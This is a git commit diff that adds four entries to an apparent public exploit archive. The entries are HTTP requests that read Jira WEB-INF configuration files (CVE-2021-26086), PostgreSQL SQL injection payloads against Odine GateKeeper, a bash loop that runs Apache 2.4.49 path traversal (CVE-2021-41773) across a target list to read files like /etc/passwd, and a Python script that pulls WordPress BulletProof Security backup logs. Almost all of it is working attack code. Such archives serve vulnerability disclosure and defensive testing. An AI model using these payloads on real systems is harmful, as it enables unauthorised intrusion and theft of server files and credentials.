DB: 2021-10-07
4 changes to exploits/shellcodes Atlassian Jira Server/Data Center 8.16.0 - Arbitrary File Read Odine Solutions GateKeeper 1.0 - 'trafficCycle' SQL Injection Wordpress Plugin BulletProof Security 5.1 - Sensitive Information Disclosure Apache HTTP Server 2.4.49 - Path Traversal
This commit is contained in:
parent
44fc5e9b1a
commit
bd08b79b4a
5 changed files with 210 additions and 0 deletions
87
exploits/multiple/webapps/50380.txt
Normal file
87
exploits/multiple/webapps/50380.txt
Normal file
|
@ -0,0 +1,87 @@
|
|||
# Exploit Title: Atlassian Jira Server/Data Center 8.16.0 - Arbitrary File Read
|
||||
# Date: 2021-10-05
|
||||
# Exploit Author: Mayank Deshmukh
|
||||
# Vendor Homepage: https://www.atlassian.com/
|
||||
# Software Link: https://www.atlassian.com/software/jira/download/data-center
|
||||
# Version: versions < 8.5.14, 8.6.0 ≤ version < 8.13.6, 8.14.0 ≤ version < 8.16.1
|
||||
# Tested on: Kali Linux & Windows 10
|
||||
# CVE : CVE-2021-26086
|
||||
|
||||
POC File #1 - web.xml
|
||||
|
||||
GET /s/cfx/_/;/WEB-INF/web.xml HTTP/1.1
|
||||
Host: 127.0.0.1:8080
|
||||
Upgrade-Insecure-Requests: 1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
Connection: close
|
||||
|
||||
|
||||
POC File #2 - seraph-config.xml
|
||||
|
||||
GET /s/cfx/_/;/WEB-INF/classes/seraph-config.xml HTTP/1.1
|
||||
Host: 127.0.0.1:8080
|
||||
Upgrade-Insecure-Requests: 1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
Connection: close
|
||||
|
||||
POC File #3 - decorators.xml
|
||||
|
||||
GET /s/cfx/_/;/WEB-INF/decorators.xml HTTP/1.1
|
||||
Host: 127.0.0.1:8080
|
||||
Upgrade-Insecure-Requests: 1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
Connection: close
|
||||
|
||||
|
||||
POC File #4 - /jira-webapp-dist/pom.properties
|
||||
|
||||
GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1
|
||||
Host: 127.0.0.1:8080
|
||||
Upgrade-Insecure-Requests: 1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
Connection: close
|
||||
|
||||
POC File #5 - /jira-webapp-dist/pom.xml
|
||||
|
||||
GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml HTTP/1.1
|
||||
Host: 127.0.0.1:8080
|
||||
Upgrade-Insecure-Requests: 1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
Connection: close
|
||||
|
||||
POC File #6 - /atlassian-jira-webapp/pom.xml
|
||||
|
||||
GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1
|
||||
Host: 127.0.0.1:8080
|
||||
Upgrade-Insecure-Requests: 1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
Connection: close
|
||||
|
||||
POC File #7 - /atlassian-jira-webapp/pom.properties
|
||||
|
||||
GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties HTTP/1.1
|
||||
Host: 127.0.0.1:8080
|
||||
Upgrade-Insecure-Requests: 1
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
Connection: close
|
42
exploits/multiple/webapps/50381.txt
Normal file
42
exploits/multiple/webapps/50381.txt
Normal file
|
@ -0,0 +1,42 @@
|
|||
# Exploit Title: Odine Solutions GateKeeper 1.0 - 'trafficCycle' SQL Injection
|
||||
# Date: 05.10.2021
|
||||
# Exploit Author: Emel Basayar
|
||||
# Vendor: Odine Solutions - odinesolutions.com
|
||||
# Vendor Homepage: https://odinesolutions.com/software/gatekeeper-simbox-antifraud/
|
||||
# Version: 1.0
|
||||
# Category: Webapps
|
||||
# Tested on: Ubuntu 18 TLS
|
||||
# Description : The vulnerability allows an attacker to inject sql commands from search section with 'trafficCycle' parameter.
|
||||
# This vulnerability was discovered during the penetration testing and the vulnerability was fixed.
|
||||
====================================================
|
||||
|
||||
# PoC : SQLi :
|
||||
|
||||
GET /rass/api/v1/trafficCycle/98 HTTP/1.1
|
||||
Host: 192.168.1.25
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
|
||||
Accept: application/json
|
||||
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Authorization: Bearer xm38HruG-htx0jNuM-l9UBCkoz-G7RigZvx
|
||||
Origin: https://192.168.1.25
|
||||
Connection: close
|
||||
Referer: https://192.168.1.25
|
||||
|
||||
Parameter: #1* (URI)
|
||||
Type: error-based
|
||||
Title: PostgreSQL AND error-based - WHERE or HAVING clause
|
||||
Payload: https://192.168.1.25:443/rass/api/v1/trafficCycle/98' AND 5042=CAST((CHR(113)||CHR(118)||CHR(112)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (5042=5042) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(98)||CHR(120)||CHR(113)) AS NUMERIC)-- yrdB
|
||||
|
||||
Type: stacked queries
|
||||
Title: PostgreSQL > 8.1 stacked queries (comment)
|
||||
Payload: https://192.168.1.25:443/rass/api/v1/trafficCycle/98';SELECT PG_SLEEP(5)--
|
||||
|
||||
Type: time-based blind
|
||||
Title: PostgreSQL > 8.1 AND time-based blind
|
||||
Payload: https://192.168.1.25:443/rass/api/v1/trafficCycle/98' AND 9405=(SELECT 9405 FROM PG_SLEEP(5))-- PasC
|
||||
---
|
||||
web application technology: Nginx
|
||||
back-end DBMS: PostgreSQL
|
||||
|
||||
====================================================
|
18
exploits/multiple/webapps/50383.sh
Executable file
18
exploits/multiple/webapps/50383.sh
Executable file
|
@ -0,0 +1,18 @@
|
|||
# Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal
|
||||
# Date: 10/05/2021
|
||||
# Exploit Author: Lucas Souza https://lsass.io
|
||||
# Vendor Homepage: https://apache.org/
|
||||
# Version: 2.4.49
|
||||
# Tested on: 2.4.49
|
||||
# CVE : CVE-2021-41773
|
||||
# Credits: Ash Daulton and the cPanel Security Team
|
||||
|
||||
#!/bin/bash
|
||||
|
||||
if [[ $1 =3D=3D '' ]]; [[ $2 =3D=3D '' ]]; then
|
||||
echo Set [TAGET-LIST.TXT] [PATH]
|
||||
echo ./PoC.sh targets.txt /etc/passwd
|
||||
exit
|
||||
fi
|
||||
for host in $(cat $1); do
|
||||
curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done
|
59
exploits/php/webapps/50382.py
Executable file
59
exploits/php/webapps/50382.py
Executable file
|
@ -0,0 +1,59 @@
|
|||
# Exploit Title: Wordpress Plugin BulletProof Security 5.1 - Sensitive Information Disclosure
|
||||
# Date 04.10.2021
|
||||
# Exploit Author: Ron Jost (Hacker5preme)
|
||||
# Vendor Homepage: https://forum.ait-pro.com/read-me-first/
|
||||
# Software Link: https://downloads.wordpress.org/plugin/bulletproof-security.5.1.zip
|
||||
# Version: <= 5.1
|
||||
# Tested on: Ubuntu 18.04
|
||||
# CVE: CVE-2021-39327
|
||||
# CWE: CWE-200
|
||||
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-39327/README.md
|
||||
|
||||
|
||||
'''
|
||||
Description:
|
||||
The BulletProof Security WordPress plugin is vulnerable to sensitive information disclosure due to a file path disclosure in the publicly accessible
|
||||
~/db_backup_log.txt file which grants attackers the full path of the site, in addition to the path of database backup files.
|
||||
This affects versions up to, and including, 5.1.
|
||||
'''
|
||||
|
||||
'''
|
||||
'Banner:
|
||||
'''
|
||||
banner = '''
|
||||
______ _______ ____ ___ ____ _ _____ ___ _________ _____
|
||||
/ ___\ \ / / ____| |___ \ / _ \___ \/ | |___ // _ \___ /___ \___ |
|
||||
| | \ \ / /| _| _____ __) | | | |__) | |_____ |_ \ (_) ||_ \ __) | / /
|
||||
| |___ \ V / | |__|_____/ __/| |_| / __/| |_____|__) \__, |__) / __/ / /
|
||||
\____| \_/ |_____| |_____|\___/_____|_| |____/ /_/____/_____/_/
|
||||
|
||||
* Sensitive information disclosure
|
||||
@ Author: Ron Jost
|
||||
'''
|
||||
print(banner)
|
||||
|
||||
|
||||
import argparse
|
||||
import requests
|
||||
|
||||
'''
|
||||
User-Input:
|
||||
'''
|
||||
my_parser = argparse.ArgumentParser(description='Wordpress Plugin BulletProof Security - Sensitive information disclosure')
|
||||
my_parser.add_argument('-T', '--IP', type=str)
|
||||
my_parser.add_argument('-P', '--PORT', type=str)
|
||||
my_parser.add_argument('-U', '--PATH', type=str)
|
||||
args = my_parser.parse_args()
|
||||
target_ip = args.IP
|
||||
target_port = args.PORT
|
||||
wp_path = args.PATH
|
||||
print('')
|
||||
print('[*] Starting Exploit:')
|
||||
print('')
|
||||
|
||||
paths = ["/wp-content/bps-backup/logs/db_backup_log.txt", "/wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt"]
|
||||
|
||||
# Exploit
|
||||
for pathadd in paths:
|
||||
x = requests.get("http://" + target_ip + ':' + target_port + '/' + wp_path + pathadd)
|
||||
print(x.text)
|
|
@ -44492,3 +44492,7 @@ id,file,description,date,author,type,platform,port
|
|||
50377,exploits/java/webapps/50377.txt,"Atlassian Confluence 7.12.2 - Pre-Authorization Arbitrary File Read",1970-01-01,"Mayank Deshmukh",webapps,java,
|
||||
50378,exploits/php/webapps/50378.py,"Wordpress Plugin TheCartPress 1.5.3.6 - Privilege Escalation (Unauthenticated)",1970-01-01,spacehen,webapps,php,
|
||||
50379,exploits/php/webapps/50379.py,"Wordpress Plugin MStore API 2.0.6 - Arbitrary File Upload",1970-01-01,spacehen,webapps,php,
|
||||
50380,exploits/multiple/webapps/50380.txt,"Atlassian Jira Server/Data Center 8.16.0 - Arbitrary File Read",1970-01-01,"Mayank Deshmukh",webapps,multiple,
|
||||
50381,exploits/multiple/webapps/50381.txt,"Odine Solutions GateKeeper 1.0 - 'trafficCycle' SQL Injection",1970-01-01,"Emel Basayar",webapps,multiple,
|
||||
50382,exploits/php/webapps/50382.py,"Wordpress Plugin BulletProof Security 5.1 - Sensitive Information Disclosure",1970-01-01,"Ron Jost",webapps,php,
|
||||
50383,exploits/multiple/webapps/50383.sh,"Apache HTTP Server 2.4.49 - Path Traversal",1970-01-01,"Lucas Souza",webapps,multiple,
|
||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue